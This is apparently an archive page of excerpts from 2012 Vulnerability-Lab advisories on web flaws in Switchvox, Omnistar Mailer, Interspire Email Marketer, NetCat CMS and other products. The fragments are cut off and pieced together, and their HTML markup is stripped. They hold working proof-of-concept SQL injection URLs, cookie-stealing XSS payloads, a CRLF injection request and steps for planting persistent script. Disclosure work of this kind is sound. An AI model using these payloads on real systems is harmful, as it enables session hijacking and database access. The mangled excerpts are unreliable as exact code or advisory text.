may not apply. We do not approve or encourage anybody to break any vendor 
licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

Domains:www.vulnerability-lab.com   - www.vuln-lab.com  
   - www.vulnerability-lab.com/register
Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com 
   - resea...@vulnerability-lab.com
Section:video.vulnerability-lab.com - forum.vulnerability-lab.com   
   - news.vulnerability-lab.com
Social: twitter.com/#!/vuln_lab

Switchvox Asterisk v5.1.2 - Multiple Web Vulnerabilities

 the poc press on test CRM Settings
3- Setup - Groups - Create Extension Group [Note]
4- Setup - Outgoing calls - Create Outgoing Call rule [Note]
5- Setup - Incoming Calls - Caller DID routes - Create Single DID Route 
[Note]
6- Setup - Incoming Calls - Caller ID Rules - Create Call transfer Call 
[Note]


1.
URL: 
https://asterisk-switchvox.127.0.0.1:1337/admin?cmd=modify_soundsound_id=478


div class=desc_divbDescription:/b Your new password must be different 
than your old password. 
Please try again.br[PERSISTENT INJECTED SCRIPT CODE!]br/[PERSISTENT 
INJECTED SCRIPT CODE!])/ifram/iframe/div



2.
URL: 
https://asterisk-switchvox.127.0.0.1:1337/admin?plugin_name=sugarcrmadmin_sbplugins_id=1cmd=modify_crm_pluginsugarcrm=1


[1101],plugin_type:system,plugin_description:Lookup up and display 
contact information straight from your SugarCRM 
server.,plugin_display:SugarCRM,plugin_name:sugarcrm,admin_sbplugins_id:1,proxy:http://\[PERSISTENT
 INJECTED SCRIPT CODE!])
/iframe,uri:http://\[PERSISTENT INJECTED SCRIPT CODE!])


3.
URL: https://asterisk-switchvox.127.0.0.1:1337/admin?cmd=extension_groups


div style=margin-right: 5px; display: none;div style=width: 400px; 
class=pwm_container_paddingdiv[PERSISTENT INJECTED SCRIPT CODE!])
/iframe'[PERSISTENT INJECTED SCRIPT CODE!])/iframe[PERSISTENT 
INJECTED SCRIPT CODE!])
/iframe'/iframe/divdiv class=clear/div/div/div/div
div style=display: none; class=pwm_top_arrow/divdiv style=left: 
187px; top: 354px; class=pwm_bottom_arrow/div


4.
URL: https://asterisk-switchvox.127.0.0.1:1337/admin?cmd=add_outgoing_rule


{call_through:{internal:{}},priority:9,name:test,description:\[PERSISTENT
 INJECTED SCRIPT CODE!])/iframe \
[PERSISTENT INJECTED SCRIPT 
CODE!],failovers:{},is_final:0,pattern:Begins with 13 and the 
remainder is 23 to 90 digits in 
length,id:103,context_type:USER}],total_items:9}},allExtensions:


5.
URL: 
https://asterisk-switchvox.127.0.0.1:1337/admin?cmd=incoming_rulespassthrough=1#pageTab=did_routes

code 

number:123,name:test,note:\[PERSISTENT INJECTED SCRIPT 
CODE!])/iframe,force_fax:0,any_provider:1,type:route_number,id:3,call_type:0},
{priority:2,action:busy,type:catchall_unknown_route,id:1}],total_items:3}},switchvox_version:40062,
menu_structure:[{children:[{children:[{cmd:view_extensions,id:manage_extensions,display:Manage},{cmd:extension_groups,id:extension_groups,display:Groups},{cmd:extension_templates,id:extension_templates,display:Templates},
{cmd:extension_permissions,id:extension_permissions,display:Permissions},{cmd:phone_setup,id:extension_phones,display:Phones},
{cmd:extension_settings,id:extension_settings,display:Settings}],id:extensions,column:1,display:Extensions},{children:
[{cmd:channel_groups,id:channel_groups,display:Channel 
Groups},{cmd:voip_providers,id:voip_providers,display:VOIP 
Providers},
{cmd:outgoing_rules,id:outgoing_calls,display:Outgoing Calls},


6.
URL: 
https://asterisk-switchvox.127.0.0.1:1337/admin?cmd=incoming_rules#pageTab=caller_id_rules


Risk:
=
The security risk of the  persistent input validation vulnerabilities are 
estimated as medium(+).



Credits:

Vulnerability Laboratory [Research Team]  -Ibrahim M. El-Sayed [the StOrM) 
(st...@vulnerability-lab.com) [http://iel-sayed.blogspot.com]



Disclaimer:
===
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and 
capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, 
indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have 
been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential 
or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor 
licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

Domains:www.vulnerability-lab.com   - www.vuln-lab.com  
   - www.vulnerability-lab.com/register
Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com 
   - resea...@vulnerability-lab.com
Section:video.vulnerability-lab.com - forum.vulnerability-lab.com   
   - news.vulnerability-lab.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab 
   - youtube.com/user/vulnerability0lab
Feeds:  vulnerability-lab.com/rss/rss.php   - 
vulnerability-lab.com/rss/rss_upcoming.php   - 
vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file 
requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form

Omnistar Mailer v7.2 - Multiple Web Vulnerabilities

2012-10-03 Thread Vulnerability Lab

):
[+] Form Name


Proof of Concept:
=
1.1
The SQL injection vulnerabilities can be exploited by remote attackers without 
user inter action. For demonstration or reproduce ...

PoC:
http://127.0.0.1:1337/mailertest/admin/responder.php?op=editid=-37'+Union+Select+version(),2,3--%20-#
http://127.0.0.1:1337/mailer/admin/preview.php?id=-2'+union+Select+1--%20-
http://127.0.0.1:1337/mailer/admin/pages.php?form_id=-2'+Union+Select+version(),2,3--%20-#%20-op=list
http://127.0.0.1:1337/mailer/admin/navlinks.php?op=editnav_id=9''+Union+Select+version(),2,3--%20-#

http://127.0.0.1:1337/mailertest/users/register.php?nav_id=-18'+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16--%20-
http://127.0.0.1:1337/mailertest/admin/pages.php?op=editid=16form_id=2'
http://127.0.0.1:1337/mailertest/admin/contacts.php?op=editid=3form_id=2'
http://127.0.0.1:1337/mailertest/users/index.php?profile=1form_id=2'
http://127.0.0.1:1337/mailertest/users/register.php?form_id=2'

--- SQL Exception ---
SQL error (You have an error in your SQL syntax; 
check the manual that corresponds to your MySQL server version for the right 
syntax to use near ''9''' at line 3)
in (
select 
navname,form_id,auto_subscribe,approve_members,confirm_email,signup_redirect,email_forward
from mailer75_navlinks
where nav_id='9''
)



1.2
The persistent input validation vulnerability can be exploited by remote 
attackers with low required user inter action  low 
privileged user account. For demonstration or reproduce ...

The attacker create a form and insert in form name field own malicious 
javascript or html code.
To create the form the attacker should to go to 
Customise Interface - Create Website Forms - Create Standard Registration 
Form - Add form 
Then inject the malicious script code i.e., iframe src=www.vuln-lab.com 
onload=alert(VL)/
When the user browses the forms page in the control panel, or any user trying 
to register for the website, 
the persistent injected script code will be executed out of the web application 
context.


Risk:
=
1.1
The security risk of the  blind SQL injection  vulnerability is estimated as 
critical.

1.2
The security risk of the persistent input validation vulnerability is estimated 
as medium(+).



Credits:

Vulnerability Laboratory [Research Team] - Ibrahim El-Sayed (the_storm) 
[st...@vulnerability-lab.com] [iel-sayed.blogspot.com]


Disclaimer:
===
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and 
capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, 
indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have 
been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential 
or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor 
licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

Domains:www.vulnerability-lab.com   - www.vuln-lab.com  
   - www.vulnerability-lab.com/register
Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com 
   - resea...@vulnerability-lab.com
Section:video.vulnerability-lab.com - forum.vulnerability-lab.com   
   - news.vulnerability-lab.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab 
   - youtube.com/user/vulnerability0lab
Feeds:  vulnerability-lab.com/rss/rss.php   - 
vulnerability-lab.com/rss/rss_upcoming.php   - 
vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file 
requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is 
granted. All other rights, including the use of other 
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All 
pictures, texts, advisories, sourcecode, videos and 
other information on this website is trademark of vulnerability-lab team  the 
specific authors or managers. To record, list (feed), 
modify, use or edit our material contact (ad...@vulnerability-lab.com or 
supp...@vulnerability-lab.com) to get a permission.

Copyright © 2012 | Vulnerability 
Laboratory



-- 
VULNERABILITY RESEARCH LABORATORY
LABORATORY RESEARCH TEAM
CONTACT: resea...@vulnerability-lab.com

Interspire Email Marketer v6.0.1 - Multiple Vulnerabilites

2012-10-09 Thread Vulnerability Lab

exploitation of the vulnerability
result in account steal, client site phishing
or client-side content request manipulation.

Vulnerable Module(s):
[+] dynamiccontenttags

Vulnerable File(s):
[+] admin/index.php?Page=AddonsAddon=dynamiccontenttags

Vulnerable Parameter(s):
[+] Action

Proof of Concept:
=
1.1
The SQL injection vulnerability can be exploited by remote attackers without
user inter action. For demonstration or reproduce ...

PoC:
http://emailmarketer.127.0.0.1:337/admin/index.php?Page=AddonsAddon=dynamiccontenttags;
Action=Editid=-1%27+UNION+Select+1,2,3,4--%20-

http://emailmarketer.127.0.0.1:337/admin/index.php?Page=AddonsAddon=dynamiccontenttags;
Action=Editid=-1%27+UNION+Select+1,version%28%29,3,4--%20-

1.2
The persistent input validation vulnerabilities can be exploited by remote
attackers with low or medium required user inter action
low privileged user account. For demonstration or reproduce ...

1.2.1
The attacker can create a user with injecting a malicious code i.e.,
iframe src=http://www.vulnerability-lab.com onload=alert(VL)/iframe, in
the field Full name.
When the admin views the users the code gets executed. The attacker also can
change his full name in the settings
and whenever the admin checks the user list, the code gets executed

URL: http://emailmarketer.127.0.0.1:337/admin/index.php?Page=UsersAction=Add

1.2.2
The attacker can Create a User group and inject a malicious code in the Group
name. Whenever the victim lists the user groups,
the code gets executed in the victim browser.

URL:
http://emailmarketer.127.0.0.1:337/admin/index.php?Page=UsersGroupsAction=createGroup

1.2.3
The attacker can inject a malicious code in the server side by adding a
contact. The attacker goes to Contacts - add contact
and then try to inject a malicious code in the email field. An error message
will pop up that the email is invalid. To bypass,
this message, the attacker creates a normal user with any email i.e.,
t...@test.com. After creating the user, the attacker edit
the user and change the email to the malicious code. The error message will not
show up and the code will get executed for any
user who will list the contacts.

URL:
http://emailmarketer.127.0.0.1:337/admin/index.php?Page=SubscribersAction=ViewList=7id=5019
URL:
http://emailmarketer.127.0.0.1:337/admin/index.php?Page=SubscribersAction=Add

1.2.4
The attacker can inject a malicious code in the server side by creating a
content block from Dynamic content tags section.
The field block name is vulnerable. Whenver the victim views the blocks the
code gets Executed.

URL:
http://emailmarketer.127.0.0.1:337/admin/index.php?Page=AddonsAddon=dynamiccontenttagsAction=edit

1.2.5
Finally, Any of the activities gets logged in the recent activity module that
gets showed in every screen in the web app.
If the attacker done with persistent malicious attacks any of the previous
malicious actions the code will get executed
again in the recent activity module.

1.3
PoC:
http://emailmarketer.127.0.0.1:337/admin/index.php?Page=AddonsAddon=
dynamiccontenttagsAction=%3E%22%3Ciframe%20src=http://www.vulnerability-lab.com%20onload=alert%28%22VL%22%29%3C/iframe%3E

Risk:
=
1.1
The security risk of the remote SQL Injection vulnerability is estimated as
critical.

1.2
The security risk of the persistent input validation vulnerabilities are
estimated as medium(+).

1.3
The security risk of the client side cross site scripting vulnerability is
estimated as low(+).

Credits:

Vulnerability Laboratory [Research Team] - Ibrahim El-Sayed (the_storm)
[st...@vulnerability-lab.com] [iel-sayed.blogspot.com]

Disclaimer:
===
The information provided in this advisory is provided as it is without any
warranty. Vulnerability-Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and
capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct,
indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have
been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential
or incidental damages so the foregoing limitation
may not apply. We do not approve or encourage anybody to break any vendor
licenses, policies, deface websites, hack into databases
or trade with fraud/stolen material.

Domains:www.vulnerability-lab.com - www.vuln-lab.com
- www.vulnerability-lab.com/register
Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com
- resea...@vulnerability-lab.com
Section:video.vulnerability-lab.com - forum.vulnerability-lab.com
- news.vulnerability-lab.com

GTA UTM Firewall GB 6.0.3 - Multiple Web Vulnerabilities

2012-10-09 Thread Vulnerability Lab

=hiddeninput id=strength name=strength 
value=95 type=hiddeninput 
id=secret_hidden name=secret_hidden value= type=hiddeninput 
id=allowGenCert name=allowGenCert 
value=1 type=hiddeninput id=remotePW_hidden name=remotePW_hidden 
value= type=hidden
iframe src=user-list_data/[PERSISTENT SCRIPT CODE!]' =/td/tr
tr
td

...  identity

class=forminput id=identity 
name=identity type=text size=60 maxlength=127 
value=iframe src=[PERSISTENT SCRIPT CODE!]
#34;)  
/ /td
/tr

...  fullName

td colspan=3input class=forminput id=fullName 
name=fullName type=text size=60 maxlength=59 
value=iframe src=a 
[PERSISTENT SCRIPT CODE!])  
/ /td
/tr
tr

...  desc

td colspan=3input class=forminput id=desc name=desc 
type=text size=60 maxlength=79 
value=iframe src=a 
#34;[PERSISTENT SCRIPT CODE!])  
/ /td
/tr


... or the secret_hidden

input id=strength name=strength value=95 type=hiddeninput 
id=secret_hidden 
name=secret_hidden value= type=hidden[PERSISTENT SCRIPT CODE!])' 
=input 
id=allowGenCert name=allowGenCert type=hidden value=1 /


URL:http://gta.127.0.0.1/config/accounts/user/user-fs_en_6.0.3





Review: VPN Certificate - Details Listing

tr
td class=formlabelSubject:/td
tdemailAddress = \[PERSISTENT SCRIPT CODE!]) , 
CN = \[PERSISTENT SCRIPT CODE!]) , O = 
[PERSISTENT SCRIPT CODE!] , L = 
[PERSISTENT SCRIPT CODE!]) , ST = 
[PERSISTENT SCRIPT CODE!]) , C = US, OU = 
i[PERSISTENT SCRIPT CODE!])  /td
/tr

Note: The vulnerable content certificate can also be exported via download 
function to review the problem.

URL: http://gta.127.0.0.1/config/vpn/certs/certs-fs_en_6.0.3


Solution:
=
Parse the input field values secret_hidden, remotePW_hidden, identity, form 
input desc, fullName  emailAddress. 
Restrict the name input fields  with a special filter when processing to load 
strings with tags like (  , double quotes  co.  ...). 
Parse also the vulnerable output listing were the script code is getting 
unsanitized executed out of the waf application context.

Note:   Your company can use the following public non malicious string list to 
verify or update ...
URL:http://www.vulnerability-lab.com/resources/documents/531.txt


Risk:
=
The vulnerabilities can be exploited with low required user inter action  
privileged user account.
The security risk of the persistent input validation vulnerabilities are 
estimated as medium.


Credits:

Vulnerability Laboratory [Research Team]  -Benjamin Kunz Mejri 
(b...@vulnerability-lab.com)


Disclaimer:
===
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and 
capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, 
indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have 
been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential 
or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor 
licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

Domains:www.vulnerability-lab.com   - www.vuln-lab.com  
   - www.vulnerability-lab.com/register
Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com 
   - resea...@vulnerability-lab.com
Section:video.vulnerability-lab.com - forum.vulnerability-lab.com   
   - news.vulnerability-lab.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab 
   - youtube.com/user/vulnerability0lab
Feeds:  vulnerability-lab.com/rss/rss.php   - 
vulnerability-lab.com/rss/rss_upcoming.php   - 
vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file 
requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is 
granted. All other rights, including the use of other 
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All 
pictures, texts, advisories, sourcecode, videos and 
other information on this website is trademark of vulnerability-lab team  the 
specific authors or managers. To record, list (feed), 
modify, use or edit our material contact (ad...@vulnerability-lab.com or 
supp...@vulnerability-lab.com) to get a permission.

Copyright © 2012 | Vulnerability 
Laboratory



-- 
VULNERABILITY RESEARCH LABORATORY
LABORATORY RESEARCH TEAM
CONTACT: resea...@vulnerability-lab.com

Endpoint Protector v4.0.4.0 - Multiple Web Vulnerabilities

2012-10-09 Thread Vulnerability Lab

 EXECUTION!]' = size=30
 Example: w2003server
/div



Review: List of Computers, Users or Groups in Details Edit Checklist Name

  ul class=sf_admin_checklist
liinput name=associated_group[] id=associated_group_1 value=1 
type=checkbox label for=associated_group_1sali/label/li
liinput name=associated_group[] id=associated_group_2 value=2 
type=checkbox label for=associated_group_2allow/label/li
liinput name=associated_group[] id=associated_group_3 value=3 
type=checkbox label for=associated_group_3IT Support/label/li
liinput name=associated_group[] id=associated_group_4 value=4 
type=checkbox label for=associated_group_4allowvpn/label/li
liinput name=associated_group[] id=associated_group_5 value=5 
type=checkbox label for=associated_group_5Gruppe-No-USB/label/li
liinput name=associated_group[] id=associated_group_6 value=6 
type=checkbox label for=associated_group_6iframe 
src=Endpoint%20Protector%204%20-%20Reporting%20and%20Administration%20Tool-5-[PERSISTENT
 SCRIPT CODE CONTEXT EXECUTION!]' = label=/li
/ul


Risk:
=
The security risk of the persistent input validation vulnerabilities are 
estimated as high(-).


Credits:

Vulnerability Laboratory [Research Team]  -Benjamin Kunz Mejri 
(b...@vulnerability-lab.com)


Disclaimer:
===
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and 
capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, 
indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have 
been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential 
or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor 
licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

Domains:www.vulnerability-lab.com   - www.vuln-lab.com  
   - www.vulnerability-lab.com/register
Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com 
   - resea...@vulnerability-lab.com
Section:video.vulnerability-lab.com - forum.vulnerability-lab.com   
   - news.vulnerability-lab.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab 
   - youtube.com/user/vulnerability0lab
Feeds:  vulnerability-lab.com/rss/rss.php   - 
vulnerability-lab.com/rss/rss_upcoming.php   - 
vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file 
requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is 
granted. All other rights, including the use of other 
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All 
pictures, texts, advisories, sourcecode, videos and 
other information on this website is trademark of vulnerability-lab team  the 
specific authors or managers. To record, list (feed), 
modify, use or edit our material contact (ad...@vulnerability-lab.com or 
supp...@vulnerability-lab.com) to get a permission.

Copyright © 2012 | Vulnerability 
Laboratory

-- 
VULNERABILITY RESEARCH LABORATORY
LABORATORY RESEARCH TEAM
CONTACT: resea...@vulnerability-lab.com

vOlk Botnet Framework v4.0 - Multiple Web Vulnerabilities

2012-10-10 Thread Vulnerability Lab

. For demonstration or reproduce ...

MSN Stealer:
The msn stealer module inside of the application displays the Bot's Name 
unsanitized. To infect the attacker back the victim can simulate a 
fake msn account login on a infected system with malicious persistent script 
code as Bot's Name. The result is a persistent script code execution 
out of Bot's Name web context in the messenger listing. The victim can hijack 
the vOlks Botnet Panel sessions or manipulate the framework with 
own malicious persistent context to stop, block, take over or disable the 
service.
  
Review: MSN STEALER - BOTS NAME

tbodytr
td width=2%div align=center
font color=#FF face=Verdana 
size=1bID/b/font/div/td
td width=12%div align=centerb
font color=#FF face=Verdana size=1Bot's Name
/font  /b  /div/td
td width=6%div align=centerb
font color=#FF face=Verdana size=1Pais
/font  /b  /div/td
td width=79%div align=centerb
font color=#FF face=Verdana size=1Login de 
msnmsgr.exe
/font  /b  /div/td
  /tr
 tr
tddiv align=centerfont color=#CC1/font/div
font color=#CC/font/td
tddiv align=centerfont color=#CC[[PERSISTENT 
INJECTED SCRIPT CODE!]]/font/div
font color=#CC/font/td



Review: Visit Webpage - Open URL

table style=border-style:solid; border-width:1px;  
background=archivos/imagen/fondo.png height=69 width=96%
  tbodytr
td align=left bgcolor=#33 height=26 width=29%font 
color=#FF face=Verdana 
size=1Open URL Bots: /font/td
td align=left bgcolor=#33 width=68%div span 
style=margin-left:0px name=div_1_mensaje 
id=div_1_mensaje font face=Verdana size=1
  input name=domin id=domin style=border:1px solid #FF; width: 
420; color:#66; font-family:
Verdana; font-size:8pt; background-color:#00; float:left; height:17 
value=[[PERSISTENT INJECTED SCRIPT CODE!]];) = size=1
/font /span /div/td
  /tr


Review: Download File

table style=border-style:solid; border-width:1px;  
background=archivos/imagen/fondo.png height=83 width=99%
  tbodytr
td align=left bgcolor=#33 height=19 width=29%font 
color=#FF face=Verdana 
size=1Download url:/font/td
td align=left bgcolor=#33 height=19 width=68%div font 
face=Verdana size=1
  input name=https id=https style=border:1px solid #FF; width: 
394; font-family:Verdana; 
font-size:8pt; color:#66; background-color:#00; float:left; 
height:17 value=http://www.;[[PERSISTENT INJECTED SCRIPT CODE!]];) 
.com= size=1
/font /span /div/td
  /tr


Review: Settings - Administrator Username  Administrator Password

tbodytr
td align=left bgcolor=#33 height=21 width=30%
font color=#FF face=Verdana size=1User Administrator  
:/font/td
td align=left bgcolor=#33 width=70%div
span style=margin-left:0px name=div_1_mensaje id=div_1_mensaje
font face=Verdana size=1
input style=border:1px solid #FF; width: 300px; font-family:Verdana; 
font-size:8pt; 
color:#66; background-color:#00 value=[[PERSISTENT INJECTED SCRIPT 
CODE!]] 
disabled=disabled name=User id=User size=1 type=text[[PERSISTENT 
INJECTED SCRIPT CODE!]]
/font/span
/div/td
/tr



tr
td align=left bgcolor=#33 height=21 width=30%font 
color=#FF face=Verdana 
size=1Password Administrator :/font/td
td align=left bgcolor=#33 width=70%
span style=margin-left:0px name=div_segundos id=div_segundos
font face=Verdana size=1
input name=Pasw id=Pasw style=border:1px solid #FF; width: 300px; 
font-family:Verdana; 
font-size:8pt; color:#66; background-color:#00 value=\ 
type=text[[PERSISTENT INJECTED SCRIPT CODE!]];) = 
size=70/font/span/td
/tr


Risk:
=
1.1
The security risk of the sql injection vulnerabilities are estimated as 
critical.

1.2
The security risk of the persistent script code inject vulnerabilities are 
estimated as medium(+).


Credits:

Vulnerability Laboratory [Research Team]  -Karim H.B. 
(k...@vulnerability-lab.com)
Vulnerability Laboratory [Research Team]  -Benjamin Kunz Mejri 
(b...@vulnerability-lab.com)


Disclaimer:
===
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and 
capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, 
indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have 
been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential 
or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor 
licenses, policies, deface websites, hack into databases

CMSQLITE v1.3.2 - Multiple Web Vulnerabiltiies

2012-10-19 Thread Vulnerability Lab

:8080/cmsqlite/admin/helper/deleteMenu.php
http://cmsqlite.127.0.0.1:8080/cmsqlite/admin/helper/deleteArticle.php
http://cmsqlite.127.0.0.1:8080/cmsqlite/admin/helper/deleteCategory.php


Risk:
=
1.1
The security risk of the local file include vulnerability is estimated as 
high(-).

1.2
The security risk of the client site cross site scripting vulnerability is 
estimated as medium(-).

1.3
The security risk of the client site cross site request forgery vulnerabilties 
are estimated as low(+).


Credits:

Katharina S.L.  (ka...@vulnerability-lab.com)


Disclaimer:
===
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and 
capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, 
indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have 
been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential 
or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor 
licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

Domains:www.vulnerability-lab.com   - www.vuln-lab.com  
   - www.vulnerability-lab.com/register
Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com 
   - resea...@vulnerability-lab.com
Section:video.vulnerability-lab.com - forum.vulnerability-lab.com   
   - news.vulnerability-lab.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab 
   - youtube.com/user/vulnerability0lab
Feeds:  vulnerability-lab.com/rss/rss.php   - 
vulnerability-lab.com/rss/rss_upcoming.php   - 
vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file 
requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is 
granted. All other rights, including the use of other 
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All 
pictures, texts, advisories, sourcecode, videos and 
other information on this website is trademark of vulnerability-lab team  the 
specific authors or managers. To record, list (feed), 
modify, use or edit our material contact (ad...@vulnerability-lab.com or 
supp...@vulnerability-lab.com) to get a permission.

Copyright © 2012 | Vulnerability 
Laboratory

-- 
VULNERABILITY RESEARCH LABORATORY
LABORATORY RESEARCH TEAM
CONTACT: resea...@vulnerability-lab.com

NetCat CMS v5.0.1 - Multiple Web Vulnerabilities

2012-11-01 Thread Vulnerability Lab

Title:
==
NetCat CMS v5.0.1 - Multiple Web Vulnerabilities


Date:
=
2012-10-31


References:
===
http://www.vulnerability-lab.com/get_content.php?id=738


VL-ID:
=
738


Common Vulnerability Scoring System:

2.5


Introduction:
=
Vendor Website: http://netcat.ru  (RU)


Abstract:
=
The Security Effect Research Team discovered multiple Web Vulnerabilities in 
the russian Bce NetCat v5.0.1 content management system.


Report-Timeline:

2012-10-31: Public Disclosure


Status:

Published


Exploitation-Technique:
===
Remote


Severity:
=
Medium


Details:

Multiple client side cross site scripting and http parameter pollution 
vulnerabilities are detected in the russian Bce NetCat v5.0.1 content 
management system.
The non persistent cross site scripting vulnerabilities allow remote attackers 
to form malicious client side web requests to steal cms customer session 
information. The client side crlf vulnerability allows remote attackers to 
change the GET and POST request with own values to manipulate the http protocol 
request.

The first client side cross site scripting vulnerability is located in the 
search module with the bound vulnerable search_query application parameter.
The secound http parameter pollution vulnerability is located in the post.php 
file when processing to request via the bound vulnerable redirect_url 
parameter request.

Successful exploitation of the vulnerabilities can result in client side http 
parameter manipulation via post/get, client side phishing, client side 
cookie stealing via cross site scripting and client side cms web context 
manipulation.


Vulnerable Module(s):
[+] search
[+] post

Vulnerable Parameter(s):
[+] search_query
[+] redirect_url


Proof of Concept:
=
1. Client Side - Cross Site Scripting
The client side cross site scripting vulnerabilities can be exploited by remote 
attackers without privileged application user 
account and with medium or high required user inter action. For demonstration 
or reproduce ...

1.1 - In URL address.

PoC:
http://site.127.0.0.1:3666/?’ onmouseover=’prompt(document.cookie)’bad=’


1.2 - In “search_query” parameter.

PoC:
http://site.127.0.0.1:3666/search/?search_query=’ 
onmouseover=prompt(document.cookie) bad=’



2. Client Side via POST - CRLF injection/HTTP Parameter Pollution
The client side crlf vulnerability can be exploited by remote attackers without 
privileged application user 
account and with medium or high required user inter action. For demonstration 
or reproduce ...

In /netcat/modules/netshop/post.php URL encoded POST input redirect_url was set 
to NetCatStatus:hacked_by_seceffect

PoC: POST
http://site.127.0.0.1:3666/netcat/modules/netshop/post.php
cart%5b353%5d%5b10%5d=1cart_mode=addredirect_url=%0d%0a%20NetCatStatus:hacked_by_seceffect


Risk:
=
1.1
The security risk of the client side cross site scripting vulnerabilities are 
estimated as low(+)|(-)medium.

1.2
The security risk of the http parameter pollution vulnerability is estimated as 
medium(-).



Credits:

SECURITY EFFECT [Research Team] - (http://seceffect.tumblr.com/)


Disclaimer:
===
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and 
capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, 
indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have 
been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential 
or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor 
licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

Domains:www.vulnerability-lab.com   - www.vuln-lab.com  
   - www.vulnerability-lab.com/register
Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com 
   - resea...@vulnerability-lab.com
Section:video.vulnerability-lab.com - forum.vulnerability-lab.com   
   - news.vulnerability-lab.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab 
   - youtube.com/user/vulnerability0lab
Feeds:  vulnerability-lab.com/rss/rss.php   - 
vulnerability-lab.com/rss/rss_upcoming.php   - 
vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file 
requires authorization from

VaM Shop v1.69 - Multiple Web Vulnerabilities

